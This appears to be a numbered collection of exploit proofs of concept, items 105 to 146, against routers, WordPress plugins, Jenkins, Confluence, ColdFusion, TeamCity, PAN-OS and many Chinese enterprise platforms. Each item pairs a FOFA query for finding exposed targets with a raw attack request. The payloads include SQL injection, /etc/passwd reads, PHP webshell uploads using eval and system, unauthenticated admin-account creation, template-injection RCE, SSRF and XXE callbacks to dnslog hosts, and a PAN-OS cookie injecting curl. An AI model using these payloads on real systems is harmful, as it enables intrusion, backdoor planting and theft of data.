POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:1121
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version:7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php
119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


boot/web/upload/weblogo/1.php

122. Beijing Byzoro (北京百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64-encoded SQL statement; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; from there system commands can be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 and earlier, 2021u7 and earlier, and 2023u1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:10055
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
